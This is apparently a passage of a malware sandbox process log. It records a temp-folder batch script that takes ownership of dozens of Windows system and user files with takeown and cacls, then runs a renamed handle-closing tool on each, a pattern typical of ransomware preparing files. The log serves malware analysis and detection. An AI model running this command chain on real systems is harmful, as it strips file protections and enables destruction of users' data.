    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:764
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:4916
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:3792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    - Modifies file permissions
    PID:2264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:276
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:272
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:4228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:4400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:4560
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:1916
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:1228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4696
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:3948
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
  2⤵
  PID:2432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
    3⤵
    PID:4572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
    3⤵
    - Modifies file permissions
    PID:2616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "BrowserCore.exe" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "BrowserCore.exe" -nobanner
      4⤵
      PID:60
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:4032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:2096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3912
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8""
  2⤵
  PID:1884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8" /E /G Admin:F /C
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8"
    3⤵
    - Modifies file permissions
    PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "baseimagefam8" -nobanner
    3⤵
    PID:448
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "baseimagefam8" -nobanner
      4⤵
      PID:2312
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\state.rsm""
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\state.rsm" /E /G Admin:F /C
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\state.rsm"
    3⤵
    - Modifies file permissions
    PID:4388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "state.rsm" -nobanner
    3⤵
    PID:2492
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "state.rsm" -nobanner
      4⤵
      PID:2768
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.f506fe86-a346-43dc-a593-43fce5ad5d27.1.etl""
  2⤵
  PID:4924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.f506fe86-a346-43dc-a593-43fce5ad5d27.1.etl" /E /G Admin:F /C
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.f506fe86-a346-43dc-a593-43fce5ad5d27.1.etl"
    3⤵
    - Modifies file permissions
    PID:3508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "WuProvider.f506fe86-a346-43dc-a593-43fce5ad5d27.1.etl" -nobanner
    3⤵
    PID:4260
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "WuProvider.f506fe86-a346-43dc-a593-43fce5ad5d27.1.etl" -nobanner
      4⤵
      PID:5068
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:3172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:3592
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:2728
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:284
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4400
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:220
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:4552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    PID:3096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2524
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1284
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.f506fe86-a346-43dc-a593-43fce5ad5d27.1.etl""
  2⤵
  PID:2336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.f506fe86-a346-43dc-a593-43fce5ad5d27.1.etl" /E /G Admin:F /C
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.f506fe86-a346-43dc-a593-43fce5ad5d27.1.etl"
    3⤵
    - Modifies file permissions
    PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "WuProvider.f506fe86-a346-43dc-a593-43fce5ad5d27.1.etl" -nobanner
    3⤵
    PID:2344
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "WuProvider.f506fe86-a346-43dc-a593-43fce5ad5d27.1.etl" -nobanner
      4⤵
      PID:2980
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    PID:2432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "device.png" -nobanner
    3⤵
    PID:344
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "device.png" -nobanner
      4⤵
      PID:1064
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:4556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:64
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    - Modifies file permissions
    PID:4196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:4204
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:4360
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:4444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3012
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4068
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:4352
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  2⤵
  PID:4220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "BrowserCore.exe.mui" -nobanner
    3⤵
    PID:3404
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "BrowserCore.exe.mui" -nobanner
      4⤵
      PID:4932
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.221af229-975b-4ebb-8166-a2d258b46299.1.etl""
  2⤵
  PID:1396
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.221af229-975b-4ebb-8166-a2d258b46299.1.etl" /E /G Admin:F /C
    3⤵
    PID:284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.221af229-975b-4ebb-8166-a2d258b46299.1.etl"
    3⤵
    - Modifies file permissions
    PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "UpdateSessionOrchestration.221af229-975b-4ebb-8166-a2d258b46299.1.etl" -nobanner
    3⤵
    PID:3812
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "UpdateSessionOrchestration.221af229-975b-4ebb-8166-a2d258b46299.1.etl" -nobanner
      4⤵
      PID:2896
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    PID:288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:4520
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:2704
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:3096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Modifies file permissions
    PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:372
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      PID:1304
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.149aac4e-54b3-4e31-b9b5-16efa4a232d5.1.etl""
  2⤵
  PID:2580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.149aac4e-54b3-4e31-b9b5-16efa4a232d5.1.etl" /E /G Admin:F /C
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.149aac4e-54b3-4e31-b9b5-16efa4a232d5.1.etl"
    3⤵
    - Modifies file permissions
    PID:1500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "UpdateSessionOrchestration.149aac4e-54b3-4e31-b9b5-16efa4a232d5.1.etl" -nobanner
    3⤵
    PID:3068
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "UpdateSessionOrchestration.149aac4e-54b3-4e31-b9b5-16efa4a232d5.1.etl" -nobanner
      4⤵
      PID:4812
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:2432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:60
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1752
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3352
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:3360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:4088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    PID:4704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:2360
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:2348
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.9237b7f8-28ea-45ee-94ad-90ad8ee2b65b.1.etl""
  2⤵
  PID:3288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.9237b7f8-28ea-45ee-94ad-90ad8ee2b65b.1.etl" /E /G Admin:F /C
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.9237b7f8-28ea-45ee-94ad-90ad8ee2b65b.1.etl"
    3⤵
    - Modifies file permissions
    PID:3680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "NotificationUxBroker.9237b7f8-28ea-45ee-94ad-90ad8ee2b65b.1.etl" -nobanner
    3⤵
    PID:448
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "NotificationUxBroker.9237b7f8-28ea-45ee-94ad-90ad8ee2b65b.1.etl" -nobanner
      4⤵
      PID:4768
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.802cee16-994e-416e-81f5-611b64c36bf0.1.etl""
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.802cee16-994e-416e-81f5-611b64c36bf0.1.etl" /E /G Admin:F /C
    3⤵
    PID:2356
